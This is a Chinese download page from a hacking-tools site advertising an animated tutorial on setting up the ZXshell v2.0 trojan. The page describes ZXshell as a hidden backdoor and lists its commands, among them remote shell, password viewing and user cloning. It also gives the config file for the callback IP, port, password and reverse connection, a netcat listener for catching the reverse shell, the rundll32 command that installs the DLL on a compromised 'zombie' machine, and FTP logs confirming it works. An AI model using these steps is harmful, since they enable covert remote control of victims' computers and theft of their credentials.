会员: 密码:  免费注册 | 忘记密码 | 会员登录 网页功能: 加入收藏 设为首页 网站搜索  
安全防线 > 攻防演示
ZXshell安装使用教学动画教程
发表日期:2005-06-03 23:19:45文件大小:5.69MB 下载次数:5303  

版权所有:
软件版本:动画
文件大小:5.69MB
操作系统:win9x/NT/2000/XP
下载说明: ZXshell安装使用教学   ZXshell v2.0是一款精致的木马,只有12K大小,拥有小榕BITS的高隐蔽性,支持正向和反向连接方式;具有类似Winshell的操作及更多实用的功能;能像网络神偷一样实现服务端上线通知,查看在线服务端IP。其主要功能如下: 命令列表 注释 ? 显示此消息 info 系统版本信息 shell 获得系统命令提示符 download Http下载 list 列出所有进程 kill 结束指定进程 termsvc 设置终端服务 fpass 查看已登录用户的密码 clone 克隆/删除任意用户 whoami 显示本服务的进程PID remove 禁用本服务 exit 退出但不关闭服务端 quit 退出并关闭服务端 reboot 重新启动计算机 shutdown 关闭计算机   ZXshell的使用过程相对简单,只要上面的命令记住就OK了。启动ZXshell,输入密码后,显示成功。注意这是不回显的,我们输入“?”是看不到的。我们输入info,回显如下: CMD>系统版本:Windows 2000 Advanced Server 语言:Chinese(PRC) 驱动程序版本:12/09/1999,5.00.2195.1 命令成功完成。   假如要删除它,只要输入remove 就可以了。其它的功能也很简单,大家自己动手操作一下就知道了。   假如你的机器不是FTP服务器或WWW服务器,在使用ZXshell时记得将MyIP改为你的IP,最好是固定的,能被公网解释到,要不然它可能不会太听话的哟。 安装   首先配置客户端,如动画演示,要填上可供下载的INI文件地址,我们用WWW或FTP都可以实现的。   在其他计算机安装了配置好的服务端后,必须将zxsvc.ini设置好后上传到配制服务端时设定的网址(或FTP),下面介绍如何设置zxsvc.ini,该文件原始内容如下(只能修“=”后面的内容): [zxconfig] MyIP=127.0.0.1 告诉服务端将UDP消息发给这个IP地址,也就是填你自己的IP,我准备只在肉机上操作 Port=2004 告诉服务端打开这个端口等待连接 Password=123456 客户端连接时需要的密码,这个可以设复杂一点 Banner=Password: 密码提示 BackConnect=0 “0”表示不采用反向连接,也就是打开端口等待连接,“1”表示通知服务端反向连接。 ServerID=123 当BackConnect=1时,这里填的数据就是要通知的服务端的ServerID号,该号在接收到的UDP消息中有提供 LocalPort=8080 当BackConnect=1时,必须配合nc.exe使用,在本地打开端口,如nc -l -p 8080,若想再次接收反弹Shell必须使用另一个LocalPort!   设置好后先运行zxrecv.exe(接受服务端的信息),然后将zxsvc.ini上传到你的主页空间(这里是FTP空间),位置必须对应在配制服务端时设定的网址,当服务端读取到该文件后先给MyIP发个信息(主机名、IP地址、ServerID号),再判断BackConnect的值,“=0”则打开Port等待连接,“=1”则判断ServerID是否与自己一样,如果是则向MyIP反弹Shell!   我们要保证INI文件能被下载到,就是FTP能正常工作。把生成的DLL文件传到另一台肉机(要控制的),并运行它,运行命令为“Rundll32 ZXshell.DLL,I”(注意I为大写),我用的是DNTU,在这儿回车就可以了,这样就安装成功了。接着我们试着连接肉机的2004端口,稍等一下,最后就可以看到熟悉的成功界面了,为Password:123456。现在我们再看一下FTP的记录,是否有读到INI文件: [2004-9-29 17:18:22] [352] Incoming connection from 218.19.130.210:1407. [2004-9-29 17:18:22] [188] Incoming connection from 218.19.130.210:1408. [2004-9-29 17:18:22] [352] Login for user "test" refused due to connection limit. [2004-9-29 17:18:22] [352] Connection closed. [2004-9-29 17:18:22] [188] Login for user "test" refused due to connection limit. [2004-9-29 17:18:22] [188] Connection closed. [2004-9-29 17:18:38] [220] User "test" began downloading "/ok.ini". [2004-9-29 17:18:38] [220] Download completed. [2004-9-29 17:18:38] [224] User "test" began downloading "/ok.ini". [2004-9-29 17:18:38] [224] Download completed.   有的,成功下载,这就表明我们的木马可以正常工作了。

立即下载
下载的书籍需要相应的阅读器才能查看,请到如果你的机器上没有相应的阅读器,请到 图书阅读工具 栏目中下载相关的工具。

返回顶部】 【打印本页】 【关闭窗口

关于我们 / 给我留言 / 版权举报 / 意见建议 / 网站编程QQ群   
Copyright ©2003- 2024 Lihuasoft.net webmaster(at)lihuasoft.net 加载时间 0.00278